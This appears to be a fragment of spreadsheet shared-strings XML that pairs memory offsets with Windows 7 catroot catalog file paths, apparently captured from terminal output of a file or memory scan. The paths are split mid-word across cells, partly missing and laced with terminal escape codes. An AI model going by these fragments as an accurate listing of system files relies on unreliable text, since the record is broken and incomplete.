    <t>856ad364e35~x86~sr-LATN-CS~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf613ee8</t>
  </si>
  <si>
    <t>856ad364e35~x86~sl-SI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6142f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printer-Dri</t>
  </si>
  <si>
    <t>vers-Package~</t>
  </si>
  <si>
    <t>64e35~</t>
  </si>
  <si>
    <t>x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf614430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-Fo</t>
  </si>
  <si>
    <t>undation-Pack</t>
  </si>
  <si>
    <t>age~31bf385</t>
  </si>
  <si>
    <t>6ad364</t>
  </si>
  <si>
    <t>e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf614608</t>
  </si>
  <si>
    <t>x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf614920</t>
  </si>
  <si>
    <t>856ad364e35~x86~~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf614a60</t>
  </si>
  <si>
    <t>x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf614c38</t>
  </si>
  <si>
    <t>856ad364e35~x86~zh-TW~7.1.7601.16492.cat_x001B_[0K_x001B_[176G</t>
  </si>
  <si>
    <t>0xdf614ee8</t>
  </si>
  <si>
    <t>856ad364e35~x86~zh-CN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf615288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-Lo</t>
  </si>
  <si>
    <t>calPrinting-E</t>
  </si>
  <si>
    <t>nterprise-P</t>
  </si>
  <si>
    <t>ackage</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6153c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-Pr</t>
  </si>
  <si>
    <t>emiumTools-Pa</t>
  </si>
  <si>
    <t>ckage~31bf3</t>
  </si>
  <si>
    <t>856ad3</t>
  </si>
  <si>
    <t>64e35~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6155a0</t>
  </si>
  <si>
    <t>e35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6158b8</t>
  </si>
  <si>
    <t>e35~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf615bd0</t>
  </si>
  <si>
    <t>e35~x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf615ee8</t>
  </si>
  <si>
    <t>x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf616248</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-XP</t>
  </si>
  <si>
    <t>SServices-Pac</t>
  </si>
  <si>
    <t>kage~31bf38</t>
  </si>
  <si>
    <t>56ad36</t>
  </si>
  <si>
    <t>4e35~x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf616560</t>
  </si>
  <si>
    <t>64e35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6166a0</t>
  </si>
  <si>
    <t>4e35~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf616878</t>
  </si>
  <si>
    <t>64e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf616c38</t>
  </si>
  <si>
    <t>64e35~x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf616ee8</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6171c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RasCMAK-Pac</t>
  </si>
  <si>
    <t>kage~31bf3856</t>
  </si>
  <si>
    <t>ad364e35~x8</t>
  </si>
  <si>
    <t>6~~6.1</t>
  </si>
  <si>
    <t>.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6175a0</t>
  </si>
  <si>
    <t>6~en-U</t>
  </si>
  <si>
    <t>S~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6176e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RasRip-Pack</t>
  </si>
  <si>
    <t>age~31bf3856a</t>
  </si>
  <si>
    <t>d364e35~x86</t>
  </si>
  <si>
    <t>~~6.1.</t>
  </si>
  <si>
    <t>7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6178b8</t>
  </si>
  <si>
    <t>S~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf617bd0</t>
  </si>
  <si>
    <t>4e35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf617d10</t>
  </si>
  <si>
    <t>.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf617ee8</t>
  </si>
  <si>
    <t>4e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6181b0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RDC-Package</t>
  </si>
  <si>
    <t>~31bf3856ad36</t>
  </si>
  <si>
    <t>4e35~x86~en</t>
  </si>
  <si>
    <t>-US~6.</t>
  </si>
  <si>
    <t>1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6184c8</t>
  </si>
  <si>
    <t>1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf618810</t>
  </si>
  <si>
    <t>7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf618b28</t>
  </si>
  <si>
    <t>~en-US</t>
  </si>
  <si>
    <t>~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf618c68</t>
  </si>
  <si>
    <t>4e35~x86~~6</t>
  </si>
  <si>
    <t>1.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf618e40</t>
  </si>
  <si>
    <t>~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6191c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RDP-BlueIP-</t>
  </si>
  <si>
    <t>7.2.7601.16415.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf619300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RecDisc-SDP</t>
  </si>
  <si>
    <t>-Package~31bf</t>
  </si>
  <si>
    <t>3856ad364e3</t>
  </si>
  <si>
    <t>5~x86~</t>
  </si>
  <si>
    <t>en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6194d8</t>
  </si>
  <si>
    <t>~x86~e</t>
  </si>
  <si>
    <t>n-US~7.2.7601.16415.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6197f0</t>
  </si>
  <si>
    <t>Package-TopLe</t>
  </si>
  <si>
    <t>vel~31bf385</t>
  </si>
  <si>
    <t>e35~x86~~7.2.7601.16415.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf619930</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RDP-WinIP-P</t>
  </si>
  <si>
    <t>ackage-MiniLP</t>
  </si>
  <si>
    <t>~31bf3856ad</t>
  </si>
  <si>
    <t>~x86~en-US~7.1.7601.16398.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf619b08</t>
  </si>
  <si>
    <t>Package-MiniL</t>
  </si>
  <si>
    <t>P~31bf3856a</t>
  </si>
  <si>
    <t>d364e3</t>
  </si>
  <si>
    <t>5~x86~en-US~7.2.7601.16415.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf619e40</t>
  </si>
  <si>
    <t>0.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61a1c0</t>
  </si>
  <si>
    <t>0xdf61a300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RemoteAssis</t>
  </si>
  <si>
    <t>tance-Package</t>
  </si>
  <si>
    <t>-Client~31b</t>
  </si>
  <si>
    <t>f3856a</t>
  </si>
  <si>
    <t>d364e35~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61a4d8</t>
  </si>
  <si>
    <t>en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61a7f0</t>
  </si>
  <si>
    <t>x86~~7</t>
  </si>
  <si>
    <t>.1.7601.16398.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61ab08</t>
  </si>
  <si>
    <t>x86~en</t>
  </si>
  <si>
    <t>-US~7.1.7601.16398.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61ae20</t>
  </si>
  <si>
    <t>ackage-TopLev</t>
  </si>
  <si>
    <t>el~31bf3856</t>
  </si>
  <si>
    <t>ad364e</t>
  </si>
  <si>
    <t>35~x86~~7.1.7601.16398.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61b118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RemoteDeskt</t>
  </si>
  <si>
    <t>opClient-Blue</t>
  </si>
  <si>
    <t>IP-Package~</t>
  </si>
  <si>
    <t>31bf38</t>
  </si>
  <si>
    <t>56ad364e35~x86~en-US~7.2.7601.16415.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61b430</t>
  </si>
  <si>
    <t>d364e35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61b748</t>
  </si>
  <si>
    <t>d364e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61b950</t>
  </si>
  <si>
    <t>56ad364e35~x86~~7.2.7601.16415.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61bb28</t>
  </si>
  <si>
    <t>d364e35~x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61be40</t>
  </si>
  <si>
    <t>0xdf61c0f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RemoteFX-Re</t>
  </si>
  <si>
    <t>moteClient-Se</t>
  </si>
  <si>
    <t>tup-Package</t>
  </si>
  <si>
    <t>856ad364e35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61c4d8</t>
  </si>
  <si>
    <t>opService-Win</t>
  </si>
  <si>
    <t>56ad364e35~x86~~7.1.7601.16398.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61c618</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SampleConte</t>
  </si>
  <si>
    <t>nt-Music-Pack</t>
  </si>
  <si>
    <t>0xdf61c7f0</t>
  </si>
  <si>
    <t>56ad364e35~x86~en-US~7.1.7601.16398.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61cb08</t>
  </si>
  <si>
    <t>opClient-WinI</t>
  </si>
  <si>
    <t>P-Package~3</t>
  </si>
  <si>
    <t>1bf385</t>
  </si>
  <si>
    <t>6ad364e35~x86~~7.1.7601.16398.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61cc48</t>
  </si>
  <si>
    <t>tup-Languag</t>
  </si>
  <si>
    <t>ePack~</t>
  </si>
  <si>
    <t>31bf3856ad364e35~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61cf80</t>
  </si>
  <si>
    <t>6ad364e35~x86~en-US~7.1.7601.16398.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61d148</t>
  </si>
  <si>
    <t>nt-Ringtones-</t>
  </si>
  <si>
    <t>Package~31b</t>
  </si>
  <si>
    <t>0xdf61d460</t>
  </si>
  <si>
    <t>0xdf61d7a8</t>
  </si>
  <si>
    <t>0xdf61dac0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RemoteFX-VM</t>
  </si>
  <si>
    <t>e~31bf3856a</t>
  </si>
  <si>
    <t>5~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61dc00</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SearchEngin</t>
  </si>
  <si>
    <t>e-Client-Pack</t>
  </si>
  <si>
    <t>0xdf61ddd8</t>
  </si>
  <si>
    <t>gePack~31bf</t>
  </si>
  <si>
    <t>3856ad</t>
  </si>
  <si>
    <t>364e35~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61e158</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStart</t>
  </si>
  <si>
    <t>up-Package~31</t>
  </si>
  <si>
    <t>bf3856ad364</t>
  </si>
  <si>
    <t>e35~x8</t>
  </si>
  <si>
    <t>6~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61e470</t>
  </si>
  <si>
    <t>6~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61e788</t>
  </si>
  <si>
    <t>0xdf61e8c8</t>
  </si>
  <si>
    <t>6~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61eaa0</t>
  </si>
  <si>
    <t>0xdf61edd8</t>
  </si>
  <si>
    <t>0xdf61f0f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ServicingBa</t>
  </si>
  <si>
    <t>seline-Ultima</t>
  </si>
  <si>
    <t>te-Package~</t>
  </si>
  <si>
    <t>56ad364e35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61f238</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ShareMedia-</t>
  </si>
  <si>
    <t>ControlPanel-</t>
  </si>
  <si>
    <t>0xdf61f570</t>
  </si>
  <si>
    <t>56ad364e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61f748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SP</t>
  </si>
  <si>
    <t>P-Component-S</t>
  </si>
  <si>
    <t>KU-Enterpri</t>
  </si>
  <si>
    <t>se-Pac</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61fa60</t>
  </si>
  <si>
    <t>se-Eva</t>
  </si>
  <si>
    <t>l-Package~31bf3856ad364e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61fd78</t>
  </si>
  <si>
    <t>6~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf61ff80</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6203c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-HomeG</t>
  </si>
  <si>
    <t>roup-Package~</t>
  </si>
  <si>
    <t>0xdf6206e0</t>
  </si>
  <si>
    <t>0xdf6208e8</t>
  </si>
  <si>
    <t>0xdf620ac0</t>
  </si>
  <si>
    <t>0xdf620dd8</t>
  </si>
  <si>
    <t>0xdf621028</t>
  </si>
  <si>
    <t>0xdf621410</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-Inbox</t>
  </si>
  <si>
    <t>Games-Package</t>
  </si>
  <si>
    <t>~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf621728</t>
  </si>
  <si>
    <t>~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf621868</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-Premi</t>
  </si>
  <si>
    <t>umInboxGames-</t>
  </si>
  <si>
    <t>0xdf621a40</t>
  </si>
  <si>
    <t>~x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf621b80</t>
  </si>
  <si>
    <t>~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf621eb8</t>
  </si>
  <si>
    <t>0xdf622028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-Multi</t>
  </si>
  <si>
    <t>playerInboxGa</t>
  </si>
  <si>
    <t>mes-Package</t>
  </si>
  <si>
    <t>856ad364e35~x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf622398</t>
  </si>
  <si>
    <t>0xdf6226e0</t>
  </si>
  <si>
    <t>0xdf6229f8</t>
  </si>
  <si>
    <t>856ad364e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf622b38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Shell-Sound</t>
  </si>
  <si>
    <t>Themes-Packag</t>
  </si>
  <si>
    <t>5~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf622d10</t>
  </si>
  <si>
    <t>856ad364e35~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf623028</t>
  </si>
  <si>
    <t>0xdf6233a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Sidebar-Kil</t>
  </si>
  <si>
    <t>lbits-SDP-Pac</t>
  </si>
  <si>
    <t>0xdf6236c0</t>
  </si>
  <si>
    <t>0xdf623800</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SimpleTCP-P</t>
  </si>
  <si>
    <t>-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6239d8</t>
  </si>
  <si>
    <t>0xdf623d10</t>
  </si>
  <si>
    <t>0xdf624028</t>
  </si>
  <si>
    <t>-US~6.1.7600.16385.cat_x001B_[0K_x001B_[172G</t>
  </si>
  <si>
    <t>0xdf624170</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SNMP-Packag</t>
  </si>
  <si>
    <t>e~31bf3856ad3</t>
  </si>
  <si>
    <t>64e35~x86~~</t>
  </si>
  <si>
    <t>00.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6244a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SnippingToo</t>
  </si>
  <si>
    <t>l-Package~31b</t>
  </si>
  <si>
    <t>~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf624680</t>
  </si>
  <si>
    <t>~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf624998</t>
  </si>
  <si>
    <t>0xdf624cb0</t>
  </si>
  <si>
    <t>.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf624eb8</t>
  </si>
  <si>
    <t>~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf625028</t>
  </si>
  <si>
    <t>0xdf625300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StickyNotes</t>
  </si>
  <si>
    <t>0xdf625618</t>
  </si>
  <si>
    <t>01.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf625820</t>
  </si>
  <si>
    <t>0xdf6259f8</t>
  </si>
  <si>
    <t>64e35~x86~e</t>
  </si>
  <si>
    <t>n-US~6</t>
  </si>
  <si>
    <t>0xdf625d10</t>
  </si>
  <si>
    <t>0xdf626320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StorageServ</t>
  </si>
  <si>
    <t>ice-Package~3</t>
  </si>
  <si>
    <t>0xdf626638</t>
  </si>
  <si>
    <t>86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf626778</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SystemResto</t>
  </si>
  <si>
    <t>re-Package~31</t>
  </si>
  <si>
    <t>0xdf626950</t>
  </si>
  <si>
    <t>86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf626a90</t>
  </si>
  <si>
    <t>0xdf626c68</t>
  </si>
  <si>
    <t>0xdf626f80</t>
  </si>
  <si>
    <t>0xdf6272f0</t>
  </si>
  <si>
    <t>0xdf627638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SUA-Package</t>
  </si>
  <si>
    <t>0xdf627950</t>
  </si>
  <si>
    <t>0xdf627a90</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TabletPC-OC</t>
  </si>
  <si>
    <t>0xdf627c68</t>
  </si>
  <si>
    <t>0xdf627f80</t>
  </si>
  <si>
    <t>0xdf628320</t>
  </si>
  <si>
    <t>0xdf628638</t>
  </si>
  <si>
    <t>0xdf628778</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Telnet-Clie</t>
  </si>
  <si>
    <t>nt-Package~31</t>
  </si>
  <si>
    <t>0xdf628950</t>
  </si>
  <si>
    <t>0xdf628c68</t>
  </si>
  <si>
    <t>0xdf628f80</t>
  </si>
  <si>
    <t>0xdf629400</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Telnet-Serv</t>
  </si>
  <si>
    <t>er-Package~31</t>
  </si>
  <si>
    <t>0xdf6295d8</t>
  </si>
  <si>
    <t>0xdf6298f0</t>
  </si>
  <si>
    <t>0xdf629c08</t>
  </si>
  <si>
    <t>0xdf629e10</t>
  </si>
  <si>
    <t>0xdf629f80</t>
  </si>
  <si>
    <t>0xdf62a258</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalSer</t>
  </si>
  <si>
    <t>vices-MiscRed</t>
  </si>
  <si>
    <t>irection-Pa</t>
  </si>
  <si>
    <t>ckage~</t>
  </si>
  <si>
    <t>31bf3856ad364e35~x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62a570</t>
  </si>
  <si>
    <t>vices-Command</t>
  </si>
  <si>
    <t>LineTools-P</t>
  </si>
  <si>
    <t>0xdf62a778</t>
  </si>
  <si>
    <t>31bf3856ad364e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62a950</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62ac68</t>
  </si>
  <si>
    <t>~31bf3856ad364e35~x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62ada8</t>
  </si>
  <si>
    <t>0xdf62af80</t>
  </si>
  <si>
    <t>0xdf62b2f0</t>
  </si>
  <si>
    <t>vices-Publish</t>
  </si>
  <si>
    <t>ing-WMIProv</t>
  </si>
  <si>
    <t>ider-P</t>
  </si>
  <si>
    <t>ackage~31bf3856ad364e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62b608</t>
  </si>
  <si>
    <t>ackage~31bf3856ad364e35~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62b920</t>
  </si>
  <si>
    <t>ackage~31bf3856ad364e35~x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62ba60</t>
  </si>
  <si>
    <t>ackage~31bf3856ad364e35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62bc38</t>
  </si>
  <si>
    <t>31bf3856ad364e35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62bee8</t>
  </si>
  <si>
    <t>0xdf62c288</t>
  </si>
  <si>
    <t>vices-UsbRedi</t>
  </si>
  <si>
    <t>rector-Pack</t>
  </si>
  <si>
    <t>age~31</t>
  </si>
  <si>
    <t>bf3856ad364e35~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62c5a0</t>
  </si>
  <si>
    <t>vices-RemoteA</t>
  </si>
  <si>
    <t>pplications</t>
  </si>
  <si>
    <t>t-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62c6e0</t>
  </si>
  <si>
    <t>vices-WMIProv</t>
  </si>
  <si>
    <t>ider-Packag</t>
  </si>
  <si>
    <t>3856ad364e35~x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62c8b8</t>
  </si>
  <si>
    <t>t-Package~31bf3856ad364e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62cbd0</t>
  </si>
  <si>
    <t>t-Package~31bf3856ad364e35~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62cd10</t>
  </si>
  <si>
    <t>bf3856ad364e35~x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62cee8</t>
  </si>
  <si>
    <t>t-Package~31bf3856ad364e35~x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62d2f0</t>
  </si>
  <si>
    <t>3856ad364e35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62d608</t>
  </si>
  <si>
    <t>0xdf62d748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TFTP-Client</t>
  </si>
  <si>
    <t>0xdf62d920</t>
  </si>
  <si>
    <t>3856ad364e35~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62dc38</t>
  </si>
  <si>
    <t>bf3856ad364e35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62dee8</t>
  </si>
  <si>
    <t>bf3856ad364e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62e278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-UIAnimation</t>
  </si>
  <si>
    <t>5~x86~ar-SA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62e590</t>
  </si>
  <si>
